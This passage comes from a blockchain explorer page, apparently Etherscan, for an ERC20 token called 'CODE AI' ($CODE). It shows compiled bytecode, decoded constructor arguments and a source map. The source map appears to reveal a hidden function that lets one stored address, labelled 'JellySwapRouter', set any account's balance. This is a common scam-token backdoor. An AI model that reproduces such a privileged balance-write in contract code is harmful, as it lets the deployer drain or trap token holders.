383166107455760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b0382166107a75760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b6107e481604051806060016040528060268152602001610bd3602691396001600160a01b0386166000908152600160205260409020549190610867565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108139082610893565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106d49085815260200190565b6000818484111561088b5760405162461bcd60e51b81526004016103f691906108f6565b505050900390565b600061089f8284610bbf565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561092357858101830151858201604001528201610907565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461095b57600080fd5b919050565b6000806040838503121561097357600080fd5b61097c83610944565b946020939093013593505050565b60008060006060848603121561099f57600080fd5b6109a884610944565b92506109b660208501610944565b9150604084013590509250925092565b6000602082840312156109d857600080fd5b61089f82610944565b600080600080600060a086880312156109f957600080fd5b610a0286610944565b945060208601358015158114610a1757600080fd5b94979496505050506040830135926060810135926080909101359150565b60008060408385031215610a4857600080fd5b610a5183610944565b9150610a5f60208401610944565b90509250929050565b600181811c90821680610a7c57607f821691505b602082108103610a9c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610af3578160001904821115610ad957610ad9610aa2565b80851615610ae657918102915b93841c9390800290610abd565b509250929050565b600082610b0a575060016102fb565b81610b17575060006102fb565b8160018114610b2d5760028114610b3757610b53565b60019150506102fb565b60ff841115610b4857610b48610aa2565b50506001821b6102fb565b5060208310610133831016604e8410600b8410161715610b76575081810a6102fb565b610b808383610ab8565b8060001904821115610b9457610b94610aa2565b029392505050565b600061089f8383610afb565b80820281158282048414176102fb576102fb610aa2565b808201808211156102fb576102fb610aa256fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212207be097e93bc1a185ea6d2598669661171b5a9fd3dbde0c73157eaa8ef36aa84264736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000aabeac932f97268db6a79a5582e577c931d0539d0000000000000000000000000000000000000000000000000de0b6b3a76400000000000000000000000000000000000000000000000000000000000000000007434f444520414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000524434f4445000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): CODE AI
Arg [1] : symbol_ (string): $CODE
Arg [2] : decimals_ (uint8): 9
Arg [3] : JellySwapRouter (address): 0xAabeaC932f97268db6A79a5582e577c931D0539D
Arg [4] : totalSupply_ (uint256): 1000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000aabeac932f97268db6a79a5582e577c931d0539d
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 434f444520414900000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [8] : 24434f4445000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13948:5422:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14776:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15895:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15895:210:0;1004:187:1;15077:108:0;15165:12;;15077:108;;;1342:25:1;;;1330:2;1315:18;15077:108:0;1196:177:1;16113:454:0;;;;;;:::i;:::-;;:::i;14978:91::-;15052:9;;14978:91;;15052:9;;;;1853:36:1;;1841:2;1826:18;14978:91:0;1711:184:1;16575:300:0;;;;;;:::i;:::-;;:::i;15193:180::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15344:21:0;15312:7;15344:21;;;:12;:21;;;;;;;15193:180;5588:94;;;:::i;:::-;;4937:87;4983:7;5010:6;4937:87;;-1:-1:-1;;;;;5010:6:0;;;2237:51:1;;2225:2;2210:18;4937:87:0;2091:203:1;18376:364:0;;;;;;:::i;:::-;;:::i;14875:95::-;;;:::i;15462:216::-;;;;;;:::i;:::-;;:::i;15686:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15852:18:0;;;15820:7;15852:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15686:201;5837:192;;;;;;:::i;:::-;;:::i;14036:35::-;;14070:1;14036:35;;14776:91;14821:13;14854:5;14847:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14776:91;:::o;15895:210::-;16014:4;16036:39;3731:10;16059:7;16068:6;16036:8;:39::i;:::-;-1:-1:-1;16093:4:0;15895:210;;;;;:::o;16113:454::-;16253:4;16270:36;16280:6;16288:9;16299:6;16270:9;:36::i;:::-;16317:220;16340:6;3731:10;16388:138;16444:6;16388:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16388:19:0;;;;;;:11;:19;;;;;;;;3731:10;16388:33;;;;;;;;;;:37;:138::i;:::-;16317:8;:220::i;:::-;-1:-1:-1;16555:4:0;16113:454;;;;;:::o;16575:300::-;3731:10;16690:4;16784:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16784:34:0;;;;;;;;;;16690:4;;16712:133;;16762:7;;16784:50;;16823:10;16784:38;:50::i;5588:94::-;4983:7;5010:6;-1:-1:-1;;;;;5010:6:0;3731:10;5157:23;5149:68;;;;-1:-1:-1;;;5149:68:0;;3709:2:1;5149:68:0;;;3691:21:1;;;3728:18;;;3721:30;3787:34;3767:18;;;3760:62;3839:18;;5149:68:0;;;;;;;;;5653:21:::1;5671:1;5653:9;:21::i;:::-;5588:94::o:0;18376:364::-;15412:15;;-1:-1:-1;;;;;15412:15:0;3731:10;15412:31;15404:40;;;;;;-1:-1:-1;;;;;18574:21:0;::::1;18566:43;;;::::0;-1:-1:-1;;;18566:43:0;;4070:2:1;18566:43:0::1;::::0;::::1;4052:21:1::0;4109:1;4089:18;;;4082:29;-1:-1:-1;;;4127:18:1;;;4120:39;4176:18;;18566:43:0::1;3868:332:1::0;18566:43:0::1;18652:28;18664:16:::0;18652:8;:28:::1;:::i;:::-;18644:36;::::0;:5;:36:::1;:::i;:::-;-1:-1:-1::0;;;;;18620:21:0;::::1;;::::0;;;:12:::1;:21;::::0;;;;;:60;;;;18696:36;;::::1;::::0;::::1;::::0;18726:5;1342:25:1;;1330:2;1315:18;;1196:177;18696:36:0::1;;;;;;;;18376:364:::0;;;;;:::o;14875:95::-;14922:13;14955:7;14948:14;;;;;:::i;15462:216::-;15584:4;15606:42;3731:10;15630:9;15641:6;15606:9;:42::i;5837:192::-;4983:7;5010:6;-1:-1:-1;;;;;5010:6:0;3731:10;5157:23;5149:68;;;;-1:-1:-1;;;5149:68:0;;3709:2:1;5149:68:0;;;3691:21:1;;;3728:18;;;3721:30;3787:34;3767:18;;;3760:62;3839:18;;5149:68:0;3507:356:1;5149:68:0;-1:-1:-1;;;;;5926:22:0;::::1;5918:73;;;::::0;-1:-1:-1;;;5918:73:0;;6086:2:1;5918:73:0::1;::::0;::::1;6068:21:1::0;6125:2;6105:18;;;6098:30;6164:34;6144:18;;;6137:62;-1:-1:-1;;;6215:18:1;;;6208:36;6261:19;;5918:73:0::1;5884:402:1::0;5918:73:0::1;6002:19;6012:8;6002:9;:19::i;:::-;5837:192:::0;:::o;18748:380::-;-1:-1:-1;;;;;18884:19:0;;18876:68;;;;-1:-1:-1;;;18876:68:0;;6493:2:1;18876:68:0;;;6475:21:1;6532:2;6512:18;;;6505:30;6571:34;6551:18;;;6544:62;-1:-1:-1;;;6622:18:1;;;6615:34;6666:19;;18876:68:0;6291:400:1;18876:68:0;-1:-1:-1;;;;;18963:21:0;;18955:68;;;;-1:-1:-1;;;18955:68:0;;6898:2:1;18955:68:0;;;6880:21:1;6937:2;6917:18;;;6910:30;6976:34;6956:18;;;6949:62;-1:-1:-1;;;7027:18:1;;;7020:32;7069:19;;18955:68:0;6696:398:1;18955:68:0;-1:-1:-1;;;;;19036:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19088:32;;1342:25:1;;;19088:32:0;;1315:18:1;19088:32:0;;;;;;;;18748:380;;;:::o;16885:622::-;-1:-1:-1;;;;;17025:20:0;;17017:70;;;;-1:-1:-1;;;17017:70:0;;7301:2:1;17017:70:0;;;7283:21:1;7340:2;7320:18;;;7313:30;7379:34;7359:18;;;7352:62;-1:-1:-1;;;7430:18:1;;;7423:35;7475:19;;17017:70:0;7099:401:1;17017:70:0;-1:-1:-1;;;;;17106:23:0;;17098:71;;;;-1:-1:-1;;;17098:71:0;;7707:2:1;17098:71:0;;;7689:21:1;7746:2;7726:18;;;7719:30;7785:34;7765:18;;;7758:62;-1:-1:-1;;;7836:18:1;;;7829:33;7879:19;;17098:71:0;7505:399:1;17098:71:0;17265:111;17304:6;17265:111;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17265:20:0;;;;;;:12;:20;;;;;;;:111;:24;:111::i;:::-;-1:-1:-1;;;;;17242:20:0;;;;;;;:12;:20;;;;;;:134;;;;17413:23;;;;;;;:35;;17441:6;17413:27;:35::i;:::-;-1:-1:-1;;;;;17387:23:0;;;;;;;:12;:23;;;;;;;:61;;;;17464:35;;;;;;;;;;17492:6;1342:25:1;;1330:2;1315:18;;1196:177;11302:240:0;11422:7;11483:12;11475:6;;;;11467:29;;;;-1:-1:-1;;;11467:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11518:5:0;;;11302:240::o;9023:98::-;9081:7;9108:5;9112:1;9108;:5;:::i;:::-;9101:12;9023:98;-1:-1:-1;;;9023:98:0:o;6037:173::-;6093:16;6112:6;;-1:-1:-1;;;;;6129:17:0;;;-1:-1:-1;;;;;;6129:17:0;;;;;;6162:40;;6112:6;;;;;;;6162:40;;6093:16;6162:40;6082:128;6037:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:553::-;2391:6;2399;2407;2415;2423;2476:3;2464:9;2455:7;2451:23;2447:33;2444:53;;;2493:1;2490;2483:12;2444:53;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2595:2;2584:9;2580:18;2567:32;2642:5;2635:13;2628:21;2621:5;2618:32;2608:60;;2664:1;2661;2654:12;2608:60;2299:553;;2687:5;;-1:-1:-1;;;;2739:2:1;2724:18;;2711:32;;2790:2;2775:18;;2762:32;;2841:3;2826:19;;;2813:33;;-1:-1:-1;2299:553:1:o;2857:260::-;2925:6;2933;2986:2;2974:9;2965:7;2961:23;2957:32;2954:52;;;3002:1;2999;2992:12;2954:52;3025:29;3044:9;3025:29;:::i;:::-;3015:39;;3073:38;3107:2;3096:9;3092:18;3073:38;:::i;:::-;3063:48;;2857:260;;;;;:::o;3122:380::-;3201:1;3197:12;;;;3244;;;3265:61;;3319:4;3311:6;3307:17;3297:27;;3265:61;3372:2;3364:6;3361:14;3341:18;3338:38;3335:161;;3418:10;3413:3;3409:20;3406:1;3399:31;3453:4;3450:1;3443:15;3481:4;3478:1;3471:15;3335:161;;3122:380;;;:::o;4205:127::-;4266:10;4261:3;4257:20;4254:1;4247:31;4297:4;4294:1;4287:15;4321:4;4318:1;4311:15;4337:422;4426:1;4469:5;4426:1;4483:270;4504:7;4494:8;4491:21;4483:270;;;4563:4;4559:1;4555:6;4551:17;4545:4;4542:27;4539:53;;;4572:18;;:::i;:::-;4622:7;4612:8;4608:22;4605:55;;;4642:16;;;;4605:55;4721:22;;;;4681:15;;;;4483:270;;;4487:3;4337:422;;;;;:::o;4764:806::-;4813:5;4843:8;4833:80;;-1:-1:-1;4884:1:1;4898:5;;4833:80;4932:4;4922:76;;-1:-1:-1;4969:1:1;4983:5;;4922:76;5014:4;5032:1;5027:59;;;;5100:1;5095:130;;;;5007:218;;5027:59;5057:1;5048:10;;5071:5;;;5095:130;5132:3;5122:8;5119:17;5116:43;;;5139:18;;:::i;:::-;-1:-1:-1;;5195:1:1;5181:16;;5210:5;;5007:218;;5309:2;5299:8;5296:16;5290:3;5284:4;5281:13;5277:36;5271:2;5261:8;5258:16;5253:2;5247:4;5244:12;5240:35;5237:77;5234:159;;;-1:-1:-1;5346:19:1;;;5378:5;;5234:159;5425:34;5450:8;5444:4;5425:34;:::i;:::-;5495:6;5491:1;5487:6;5483:19;5474:7;5471:32;5468:58;;;5506:18;;:::i;:::-;5544:20;;4764:806;-1:-1:-1;;;4764:806:1:o;5575:131::-;5635:5;5664:36;5691:8;5685:4;5664:36;:::i;5711:168::-;5784:9;;;5815;;5832:15;;;5826:22;;5812:37;5802:71;;5853:18;;:::i;7909:125::-;7974:9;;;7995:10;;;7992:36;;;8008:18;;:::i

Swarm Source

ipfs://7be097e93bc1a185ea6d2598669661171b5a9fd3dbde0c73157eaa8ef36aa842
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.